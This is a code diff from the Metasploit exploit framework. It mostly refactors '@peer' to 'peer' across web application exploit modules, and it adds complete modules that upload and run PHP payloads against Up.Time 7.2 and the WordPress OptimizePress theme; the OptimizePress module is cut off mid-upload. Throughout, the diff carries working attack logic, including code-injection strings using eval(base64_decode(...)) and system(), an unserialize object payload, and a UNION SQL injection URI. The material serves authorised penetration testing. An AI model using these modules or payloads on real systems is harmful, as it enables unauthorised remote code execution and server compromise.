@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
@clean_files.each do |f| @clean_files.each do |f|
print_warning("#{@peer} - Removing: #{f}") print_warning("#{peer} - Removing: #{f}")
begin begin
if cli.type == 'meterpreter' if cli.type == 'meterpreter'
cli.fs.file.rm(f) cli.fs.file.rm(f)
@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote
cli.shell_command_token("rm #{f}") cli.shell_command_token("rm #{f}")
end end
rescue ::Exception => e rescue ::Exception => e
print_error("#{@peer} - Unable to remove #{f}: #{e.message}") print_error("#{peer} - Unable to remove #{f}: #{e.message}")
end end
end end
end end
@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
cookie = cookie.to_s.scan(/(qdpm\=\w+)\;/).flatten[0] cookie = cookie.to_s.scan(/(qdpm\=\w+)\;/).flatten[0]
# Get user data # Get user data
vprint_status("#{@peer} - Enumerating user data") vprint_status("#{peer} - Enumerating user data")
res = send_request_raw({ res = send_request_raw({
'uri' => "#{base}/index.php/home/myAccount", 'uri' => "#{base}/index.php/home/myAccount",
'cookie' => cookie 'cookie' => cookie
@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
return {} if not res return {} if not res
if res.code == 404 if res.code == 404
print_error("#{@peer} - #{username} does not actually have a 'myAccount' page") print_error("#{peer} - #{username} does not actually have a 'myAccount' page")
return {} return {}
end end
@ -208,35 +208,33 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if not res if not res
print_error("#{@peer} - Unable to request the file") print_error("#{peer} - Unable to request the file")
return return
end end
fname = res.body.scan(/\<input type\=\"hidden\" name\=\"preview\_photo\" id\=\"preview\_photo\" value\=\"(\d+\-\w+\.php)\" \/\>/).flatten[0] || '' fname = res.body.scan(/\<input type\=\"hidden\" name\=\"preview\_photo\" id\=\"preview\_photo\" value\=\"(\d+\-\w+\.php)\" \/\>/).flatten[0] || ''
if fname.empty? if fname.empty?
print_error("#{@peer} - Unable to extract the real filename") print_error("#{peer} - Unable to extract the real filename")
return return
end end
# Now that we have the filename, request it # Now that we have the filename, request it
print_status("#{@peer} - Uploaded file was renmaed as '#{fname}'") print_status("#{peer} - Uploaded file was renmaed as '#{fname}'")
send_request_raw({'uri'=>"#{base}/uploads/users/#{fname}"}) send_request_raw({'uri'=>"#{base}/uploads/users/#{fname}"})
handler handler
end end
def exploit def exploit
@peer = "#{rhost}:#{rport}"
uri = normalize_uri(target_uri.path) uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/' uri << '/' if uri[-1,1] != '/'
base = File.dirname("#{uri}.") base = File.dirname("#{uri}.")
user = datastore['USERNAME'] user = datastore['USERNAME']
pass = datastore['PASSWORD'] pass = datastore['PASSWORD']
print_status("#{@peer} - Attempt to login with '#{user}:#{pass}'") print_status("#{peer} - Attempt to login with '#{user}:#{pass}'")
opts = login(base, user, pass) opts = login(base, user, pass)
if opts.empty? if opts.empty?
print_error("#{@peer} - Login unsuccessful") print_error("#{peer} - Login unsuccessful")
return return
end end
@ -253,7 +251,7 @@ class Metasploit3 < Msf::Exploit::Remote
p = get_write_exec_payload("/tmp/#{bin_name}", bin) p = get_write_exec_payload("/tmp/#{bin_name}", bin)
end end
print_status("#{@peer} - Uploading PHP payload (#{p.length.to_s} bytes)...") print_status("#{peer} - Uploading PHP payload (#{p.length.to_s} bytes)...")
opts = opts.merge({ opts = opts.merge({
'username' => user.scan(/^(.+)\@.+/).flatten[0] || '', 'username' => user.scan(/^(.+)\@.+/).flatten[0] || '',
'email' => user, 'email' => user,
@ -262,11 +260,11 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
uploader = upload_php(base, opts) uploader = upload_php(base, opts)
if not uploader if not uploader
print_error("#{@peer} - Unable to upload") print_error("#{peer} - Unable to upload")
return return
end end
print_status("#{@peer} - Executing '#{php_fname}'") print_status("#{peer} - Executing '#{php_fname}'")
exec_php(base, opts) exec_php(base, opts)
end end
end end

14
modules/exploits/multi/http/sflog_upload_exec.rb
View File

@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote
post_data = data.to_s post_data = data.to_s
post_data = post_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') post_data = post_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
print_status("#{@peer} - Uploading payload (#{p.length.to_s} bytes)...") print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...")
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
'uri' => "#{base}/admin/manage.php", 'uri' => "#{base}/admin/manage.php",
@ -122,15 +122,15 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if not res if not res
print_error("#{@peer} - No response from host") print_error("#{peer} - No response from host")
return return
end end
target_path = "#{base}/blogs/download/uploads/#{php_fname}" target_path = "#{base}/blogs/download/uploads/#{php_fname}"
print_status("#{@peer} - Requesting '#{target_path}'...") print_status("#{peer} - Requesting '#{target_path}'...")
res = send_request_raw({'uri'=>target_path}) res = send_request_raw({'uri'=>target_path})
if res and res.code == 404 if res and res.code == 404
print_error("#{@peer} - Upload unsuccessful: #{res.code.to_s}") print_error("#{peer} - Upload unsuccessful: #{res.code.to_s}")
return return
end end
@ -139,17 +139,15 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
@peer = "#{rhost}:#{rport}"
uri = normalize_uri(target_uri.path) uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/' uri << '/' if uri[-1,1] != '/'
base = File.dirname("#{uri}.") base = File.dirname("#{uri}.")
print_status("#{@peer} - Attempt to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") print_status("#{peer} - Attempt to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")
cookie = do_login(base) cookie = do_login(base)
if cookie.empty? if cookie.empty?
print_error("#{@peer} - Unable to login") print_error("#{peer} - Unable to login")
return return
end end

14
modules/exploits/multi/http/sonicwall_gms_upload.rb
View File

@ -159,16 +159,14 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit def exploit
@peer = "#{rhost}:#{rport}"
# Get Tomcat installation path # Get Tomcat installation path
print_status("#{@peer} - Retrieving Tomcat installation path...") print_status("#{peer} - Retrieving Tomcat installation path...")
if install_path.nil? if install_path.nil?
fail_with(Failure::NotVulnerable, "#{@peer} - Unable to retrieve the Tomcat installation path") fail_with(Failure::NotVulnerable, "#{peer} - Unable to retrieve the Tomcat installation path")
end end
print_good("#{@peer} - Tomcat installed on #{install_path}") print_good("#{peer} - Tomcat installed on #{install_path}")
if target['Platform'] == "java" if target['Platform'] == "java"
exploit_java exploit_java
@ -178,7 +176,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit_java def exploit_java
print_status("#{@peer} - Uploading WAR file") print_status("#{peer} - Uploading WAR file")
app_base = rand_text_alphanumeric(4+rand(32-4)) app_base = rand_text_alphanumeric(4+rand(32-4))
war = payload.encoded_war({ :app_name => app_base }).to_s war = payload.encoded_war({ :app_name => app_base }).to_s
@ -195,7 +193,7 @@ class Metasploit3 < Msf::Exploit::Remote
select(nil, nil, nil, 2) select(nil, nil, nil, 2)
# Now make a request to trigger the newly deployed war # Now make a request to trigger the newly deployed war
print_status("#{@peer} - Attempting to launch payload in deployed WAR...") print_status("#{peer} - Attempting to launch payload in deployed WAR...")
res = send_request_cgi( res = send_request_cgi(
{ {
'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
@ -209,7 +207,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit_native def exploit_native
print_status("#{@peer} - Uploading executable file") print_status("#{peer} - Uploading executable file")
exe = payload.encoded_exe exe = payload.encoded_exe
exe_filename = path_join(install_path, Rex::Text.rand_text_alpha(8)) exe_filename = path_join(install_path, Rex::Text.rand_text_alpha(8))
if target['Platform'] == "win" if target['Platform'] == "win"

50
modules/exploits/multi/http/testlink_upload_exec.rb
View File

@ -152,34 +152,34 @@ class Metasploit3 < Msf::Exploit::Remote
base = normalize_uri(target_uri.path) base = normalize_uri(target_uri.path)
base << '/' if base[-1, 1] != '/' base << '/' if base[-1, 1] != '/'
@peer = "#{rhost}:#{rport}"
datastore['COOKIE'] = "PHPSESSID="+rand_text_alpha_lower(26)+";" datastore['COOKIE'] = "PHPSESSID="+rand_text_alpha_lower(26)+";"
# register an account # register an account
user = rand_text_alphanumeric(rand(10)+6) user = rand_text_alphanumeric(rand(10)+6)
print_status("#{@peer} - Registering user (#{user})") print_status("#{peer} - Registering user (#{user})")
res = register(base, user, user) res = register(base, user, user)
if res and res.code == 200 and res.body =~ /\<html\>\<head\>\<\/head\>\<body\>\<script type='text\/javascript'\>location\.href=/ if res and res.code == 200 and res.body =~ /\<html\>\<head\>\<\/head\>\<body\>\<script type='text\/javascript'\>location\.href=/
print_status("#{@peer} - Registered successfully") print_status("#{peer} - Registered successfully")
else else
print_error("#{@peer} - Registration failed") print_error("#{peer} - Registration failed")
return return
end end
# login # login
print_status("#{@peer} - Authenticating user (#{user})") print_status("#{peer} - Authenticating user (#{user})")
res = login(base, user, user) res = login(base, user, user)
if res and res.code == 200 and res.body =~ /\<html\>\<head\>\<\/head\>\<body\>\<script type='text\/javascript'\>location\.href=/ if res and res.code == 200 and res.body =~ /\<html\>\<head\>\<\/head\>\<body\>\<script type='text\/javascript'\>location\.href=/
print_status("#{@peer} - Authenticated successfully") print_status("#{peer} - Authenticated successfully")
else else
print_error("#{@peer} - Authentication failed") print_error("#{peer} - Authentication failed")
return return
end end
# set id and table name # set id and table name
id = rand(1000)+1 id = rand(1000)+1
table = 'nodes_hierarchy' table = 'nodes_hierarchy'
print_status("#{@peer} - Setting id (#{id}) and table name (#{table})") print_status("#{peer} - Setting id (#{id}) and table name (#{table})")
begin begin
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
@ -187,35 +187,35 @@ class Metasploit3 < Msf::Exploit::Remote
'cookie' => datastore['COOKIE'], 'cookie' => datastore['COOKIE'],
}) })
if res and res.code == 200 if res and res.code == 200
print_status("#{@peer} - Setting id and table name successfully") print_status("#{peer} - Setting id and table name successfully")
else else
print_error("#{@peer} - Setting id and table name failed") print_error("#{peer} - Setting id and table name failed")
return return
end end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed") print_error("#{peer} - Connection failed")
return return
end end
# upload PHP payload to ./upload_area/nodes_hierarchy/[id]/ # upload PHP payload to ./upload_area/nodes_hierarchy/[id]/
print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
fname = rand_text_alphanumeric(rand(10)+6) + '.php' fname = rand_text_alphanumeric(rand(10)+6) + '.php'
php = %Q|<?php #{payload.encoded} ?>| php = %Q|<?php #{payload.encoded} ?>|
begin begin
res = upload(base, fname, php) res = upload(base, fname, php)
if res and res.code == 200 and res.body =~ /<p>File uploaded<\/p>/ if res and res.code == 200 and res.body =~ /<p>File uploaded<\/p>/
print_good("#{@peer} - File uploaded successfully") print_good("#{peer} - File uploaded successfully")
else else
print_error("#{@peer} - Uploading PHP payload failed") print_error("#{peer} - Uploading PHP payload failed")
return return
end end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed") print_error("#{peer} - Connection failed")
return return
end end
# attempt to retrieve real file name from directory index # attempt to retrieve real file name from directory index
print_status("#{@peer} - Retrieving real file name from directory index.") print_status("#{peer} - Retrieving real file name from directory index.")
begin begin
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
@ -223,19 +223,19 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/ if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
@token = $1 @token = $1
print_good("#{@peer} - Successfully retrieved file name (#{@token})") print_good("#{peer} - Successfully retrieved file name (#{@token})")
else else
print_error("#{@peer} - Could not retrieve file name from directory index.") print_error("#{peer} - Could not retrieve file name from directory index.")
end end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed") print_error("#{peer} - Connection failed")
return return
end end
# attempt to retrieve real file name from the database # attempt to retrieve real file name from the database
if @token.nil? if @token.nil?
print_status("#{@peer} - Retrieving real file name from the database.") print_status("#{peer} - Retrieving real file name from the database.")
sqli = normalize_uri(base, "lib/ajax/gettprojectnodes.php") + "?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--" sqli = normalize_uri(base, "lib/ajax/gettprojectnodes.php") + "?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--"
begin begin
res = send_request_cgi({ res = send_request_cgi({
@ -245,26 +245,26 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/ if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
@token = $1 @token = $1
print_good("#{@peer} - Successfully retrieved file name (#{@token})") print_good("#{peer} - Successfully retrieved file name (#{@token})")
else else
print_error("#{@peer} - Could not retrieve file name from the database.") print_error("#{peer} - Could not retrieve file name from the database.")
return return
end end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed") print_error("#{peer} - Connection failed")
return return
end end
end end
# retrieve and execute PHP payload # retrieve and execute PHP payload
print_status("#{@peer} - Executing payload (#{@token}.php)") print_status("#{peer} - Executing payload (#{@token}.php)")
begin begin
send_request_cgi({ send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(base, "upload_area", "nodes_hierarchy", id, "#{@token}.php") 'uri' => normalize_uri(base, "upload_area", "nodes_hierarchy", id, "#{@token}.php")
}) })
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed") print_error("#{peer} - Connection failed")
return return
end end

99
modules/exploits/multi/http/uptime_file_upload.rb Normal file
View File

@ -0,0 +1,99 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Up.Time Monitoring Station post2file.php Arbitrary File Upload',
'Description' => %q{
This module exploits an arbitrary file upload vulnerability found within the Up.Time
monitoring server 7.2 and below. A malicious entity can upload a PHP file into the
webroot without authentication, leading to arbitrary code execution.
},
'Author' =>
[
'Denis Andzakovic <denis.andzakovic[at]security-assessment.com>' # Vulnerability discoverey and MSF module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '100423' ],
[ 'BID', '64031'],
[ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Up.Time%207.2%20-%20Arbitrary%20File%20Upload.pdf' ]
],
'Payload' =>
{
'Space' => 10000, # just a big enough number to fit any PHP payload
'DisableNops' => true
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Up.Time 7.2', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 19 2013'))
register_options([
OptString.new('TARGETURI', [true, 'The full URI path to the Up.Time instance', '/']),
Opt::RPORT(9999)
], self.class)
end
def check
uri = target_uri.path
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'wizards', 'post2file.php')
})
if res and res.code == 500 and res.body.to_s =~ /<title><\/title>/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Unknown
end
def exploit
print_status("#{peer} - Uploading PHP to Up.Time server")
uri = target_uri.path
@payload_name = "#{rand_text_alpha(5)}.php"
php_payload = get_write_exec_payload(:unlink_self => true)
post_data = ({
"file_name" => @payload_name,
"script" => php_payload
})
print_status("#{peer} - Uploading payload #{@payload_name}")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'wizards', 'post2file.php'),
'vars_post' => post_data,
})
unless res and res.code == 200 and res.body.to_s =~ /<title><\/title>/
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
end
print_status("#{peer} - Executing payload #{@payload_name}")
res = send_request_cgi({
'uri' => normalize_uri(uri, 'wizards', @payload_name),
'method' => 'GET'
})
end
end

16
modules/exploits/multi/http/wikka_spam_exec.rb
View File

@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
if res and res.headers['Set-Cookie'] if res and res.headers['Set-Cookie']
cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0] cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0]
else else
fail_with(Failure::Unknown, "#{@peer} - No cookie found, will not continue") fail_with(Failure::Unknown, "#{peer} - No cookie found, will not continue")
end end
cookie cookie
@ -120,7 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote
login[name] = value login[name] = value
end end
else else
fail_with(Failure::Unknown, "#{@peer} - Unable to find the hidden fieldset required for login") fail_with(Failure::Unknown, "#{peer} - Unable to find the hidden fieldset required for login")
end end
# Add the rest of fields required for login # Add the rest of fields required for login
@ -147,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote
cookie_cred = "#{cookie}; #{user}; #{pass}" cookie_cred = "#{cookie}; #{user}; #{pass}"
else else
cred = "#{datastore['USERNAME']}:#{datastore['PASSWORD']}" cred = "#{datastore['USERNAME']}:#{datastore['PASSWORD']}"
fail_with(Failure::Unknown, "#{@peer} - Unable to login with \"#{cred}\"") fail_with(Failure::Unknown, "#{peer} - Unable to login with \"#{cred}\"")
end end
return cookie_cred return cookie_cred
@ -171,7 +171,7 @@ class Metasploit3 < Msf::Exploit::Remote
fields[n] = v fields[n] = v
end end
else else
fail_with(Failure::Unknown, "#{@peer} - Cannot get necessary fields before posting a comment") fail_with(Failure::Unknown, "#{peer} - Cannot get necessary fields before posting a comment")
end end
# Generate enough URLs to trigger spam logging # Generate enough URLs to trigger spam logging
@ -206,18 +206,16 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
@peer = "#{rhost}:#{rport}"
@base = normalize_uri(target_uri.path) @base = normalize_uri(target_uri.path)
@base << '/' if @base[-1, 1] != '/' @base << '/' if @base[-1, 1] != '/'
print_status("#{@peer} - Getting cookie") print_status("#{peer} - Getting cookie")
cookie = get_cookie cookie = get_cookie
print_status("#{@peer} - Logging in") print_status("#{peer} - Logging in")
cred = login(cookie) cred = login(cookie)
print_status("#{@peer} - Triggering spam logging") print_status("#{peer} - Triggering spam logging")
inject_exec(cred) inject_exec(cred)
handler handler

4
modules/exploits/unix/webapp/datalife_preview_exec.rb
View File

@ -86,9 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit def exploit
@peer = "#{rhost}:#{rport}" print_status("#{peer} - Exploiting the preg_replace() to execute PHP code")
print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code")
res = send_injection("#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//") res = send_injection("#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//")
end end
end end

14
modules/exploits/unix/webapp/hastymail_exec.rb
View File

@ -64,12 +64,11 @@ class Metasploit3 < Msf::Exploit::Remote
@uri = normalize_uri(target_uri.path) @uri = normalize_uri(target_uri.path)
@uri << '/' if @uri[-1,1] != '/' @uri << '/' if @uri[-1,1] != '/'
@session_id = "" @session_id = ""
@peer = "#{rhost}:#{rport}"
login login
if not @session_id or @session_id.empty? if not @session_id or @session_id.empty?
print_error "#{@peer} - Authentication failed" print_error "#{peer} - Authentication failed"
return Exploit::CheckCode::Unknown return Exploit::CheckCode::Unknown
end end
@ -105,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote
if res and res.code == 303 if res and res.code == 303
@session_id = res["Set-Cookie"] @session_id = res["Set-Cookie"]
print_good "#{@peer} - Authentication successful" print_good "#{peer} - Authentication successful"
end end
end end
@ -113,17 +112,16 @@ class Metasploit3 < Msf::Exploit::Remote
@uri = normalize_uri(target_uri.path) @uri = normalize_uri(target_uri.path)
@uri << '/' if @uri[-1,1] != '/' @uri << '/' if @uri[-1,1] != '/'
@session_id = "" @session_id = ""
@peer = "#{rhost}:#{rport}"
print_status "#{@peer} - Trying login" print_status "#{peer} - Trying login"
login login
if not @session_id or @session_id.empty? if not @session_id or @session_id.empty?
print_error "#{@peer} - Authentication failed" print_error "#{peer} - Authentication failed"
return return
end end
print_status "#{@peer} - Authentication successfully, trying to exploit" print_status "#{peer} - Authentication successfully, trying to exploit"
data = "rs=passthru&" data = "rs=passthru&"
data << "rsargs[]=#{rand_text_alpha(rand(4) + 4)}&" data << "rsargs[]=#{rand_text_alpha(rand(4) + 4)}&"
@ -140,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if not res or res.code != 200 or not res.body =~ /\+/ if not res or res.code != 200 or not res.body =~ /\+/
print_error "#{@peer} - Exploitation failed" print_error "#{peer} - Exploitation failed"
return return
end end

20
modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb
View File

@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def cookie_prefix def cookie_prefix
print_status("#{@peer} - Checking for cookie prefix") print_status("#{peer} - Checking for cookie prefix")
cookie_prefix = "" cookie_prefix = ""
res = send_request_cgi( res = send_request_cgi(
{ {
@ -76,14 +76,13 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if res and res.code == 200 and res.headers['Set-Cookie'] =~ /(.+)session/ if res and res.code == 200 and res.headers['Set-Cookie'] =~ /(.+)session/
print_status("#{@peer} - Cookie prefix #{$1} found") print_status("#{peer} - Cookie prefix #{$1} found")
cookie_prefix = $1 cookie_prefix = $1
end end
return cookie_prefix return cookie_prefix
end end
def check def check
@peer = "#{rhost}:#{rport}"
check_str = Rex::Text.uri_encode('a:1:{i:0;O:1:"x":0:{}}') check_str = Rex::Text.uri_encode('a:1:{i:0;O:1:"x":0:{}}')
res = send_request_cgi( res = send_request_cgi(
{ {
@ -105,18 +104,17 @@ class Metasploit3 < Msf::Exploit::Remote
if client.type == "meterpreter" if client.type == "meterpreter"
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
begin begin
print_warning("#{@peer} - Deleting #{@upload_php}") print_warning("#{peer} - Deleting #{@upload_php}")
client.fs.file.rm(@upload_php) client.fs.file.rm(@upload_php)
print_good("#{@peer} - #{@upload_php} removed to stay ninja") print_good("#{peer} - #{@upload_php} removed to stay ninja")
rescue rescue
print_error("#{@peer} - Unable to remove #{f}") print_error("#{peer} - Unable to remove #{f}")
end end
end end
end end
def exploit def exploit
@upload_php = rand_text_alpha(rand(4) + 4) + ".php" @upload_php = rand_text_alpha(rand(4) + 4) + ".php"
@peer = "#{rhost}:#{rport}"
# get_write_exec_payload uses a function, which limits our ability to support # get_write_exec_payload uses a function, which limits our ability to support
# Linux payloads, because that requires a space: # Linux payloads, because that requires a space:
@ -131,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
db_driver_mysql = "a:1:{i:0;O:15:\"db_driver_mysql\":1:{s:3:\"obj\";a:2:{s:13:\"use_debug_log\";i:1;s:9:\"debug_log\";s:#{"cache/#{@upload_php}".length}:\"cache/#{@upload_php}\";}}}" db_driver_mysql = "a:1:{i:0;O:15:\"db_driver_mysql\":1:{s:3:\"obj\";a:2:{s:13:\"use_debug_log\";i:1;s:9:\"debug_log\";s:#{"cache/#{@upload_php}".length}:\"cache/#{@upload_php}\";}}}"
print_status("#{@peer} - Exploiting the unserialize() to upload PHP code") print_status("#{peer} - Exploiting the unserialize() to upload PHP code")
res = send_request_cgi( res = send_request_cgi(
{ {
@ -141,16 +139,16 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if not res or res.code != 200 if not res or res.code != 200
print_error("#{@peer} - Exploit failed: #{res.code}") print_error("#{peer} - Exploit failed: #{res.code}")
return return
end end
print_status("#{@peer} - Executing the payload #{@upload_php}") print_status("#{peer} - Executing the payload #{@upload_php}")
res = send_request_raw({'uri' => "#{base}cache/#{@upload_php}"}) res = send_request_raw({'uri' => "#{base}cache/#{@upload_php}"})
if res if res
print_error("#{@peer} - Payload execution failed: #{res.code}") print_error("#{peer} - Payload execution failed: #{res.code}")
return return
end end

4
modules/exploits/unix/webapp/kimai_sqli.rb
View File

@ -26,8 +26,8 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
[ [
'drone (@dronesec)', # Discovery and PoC 'drone', # Discovery and PoC
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit module
], ],
'References' => 'References' =>
[ [

10
modules/exploits/unix/webapp/php_charts_exec.rb
View File

@ -93,24 +93,24 @@ class Metasploit3 < Msf::Exploit::Remote
base = target_uri.path base = target_uri.path
base << '/' if base[-1, 1] != '/' base << '/' if base[-1, 1] != '/'
@peer = "#{rhost}:#{rport}"
code = Rex::Text.uri_encode(Rex::Text.encode_base64(payload.encoded+"&")) code = Rex::Text.uri_encode(Rex::Text.encode_base64(payload.encoded+"&"))
rand_key_value = rand_text_alphanumeric(rand(10)+6) rand_key_value = rand_text_alphanumeric(rand(10)+6)
# send payload # send payload
print_status("#{@peer} - Sending payload (#{code.length} bytes)") print_status("#{peer} - Sending payload (#{code.length} bytes)")
begin begin
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => "#{base}wizard/url.php?${system(base64_decode(\"#{code}\"))}=#{rand_key_value}" 'uri' => "#{base}wizard/url.php?${system(base64_decode(\"#{code}\"))}=#{rand_key_value}"
}) })
if res and res.code == 500 if res and res.code == 500
print_good("#{@peer} - Payload sent successfully") print_good("#{peer} - Payload sent successfully")
else else
fail_with(Failure::UnexpectedReply, "#{@peer} - Sending payload failed") fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed")
end end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed") fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end end
end end

147
modules/exploits/unix/webapp/php_wordpress_optimizepress.rb Normal file
View File

@ -0,0 +1,147 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'uri'
class Metasploit3 < Msf::Exploit::Remote
include Msf::HTTP::Wordpress
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress OptimizePress Theme File Upload Vulnerability',
'Description' => %q{
This module exploits a vulnerability found in the the Wordpress theme OptimizePress. The
vulnerability is due to an insecure file upload on the media-upload.php component, allowing
an attacker to upload arbitrary PHP code. This module has been tested successfully on
OptimizePress 1.45.
},
'Author' =>
[
'United of Muslim Cyber Army', # Vulnerability discovery
'Mekanismen' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', "http://www.osirt.com/2013/11/wordpress-optimizepress-hack-file-upload-vulnerability/" ]
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [ ['OptimizePress', {}] ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 29 2013'
))
register_advanced_options(
[
OptString.new('THEMEDIR', [ true, 'OptimizePress Theme directory', 'OptimizePress'])
])
end
def check
uri = target_uri.path
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php')
})
if res and res.code == 200 and res.body.to_s =~ /Upload New Image/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
uri = normalize_uri(target_uri.path)
#get upload filepath
print_status("#{peer} - Getting the upload path...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php')
})
unless res and res.code == 200
fail_with(Failure::Unknown, "#{peer} - Unable to access vulnerable URL")
end
if res.body =~ /<input name="imgpath" type="hidden" id="imgpath" value="(.*)" \/>/
file_path = $1
else
fail_with(Failure::Unknown, "#{peer} - Unable to get upload filepath")
end
#set cookie
cookie = res.get_cookies
filename = rand_text_alphanumeric(8) + ".php"
#upload payload
post_data = Rex::MIME::Message.new
post_data.add_part("<?php #{payload.encoded} ?>", "application/octet-stream", nil, "form-data; name=\"newcsimg\"; filename=\"#{filename}\"")
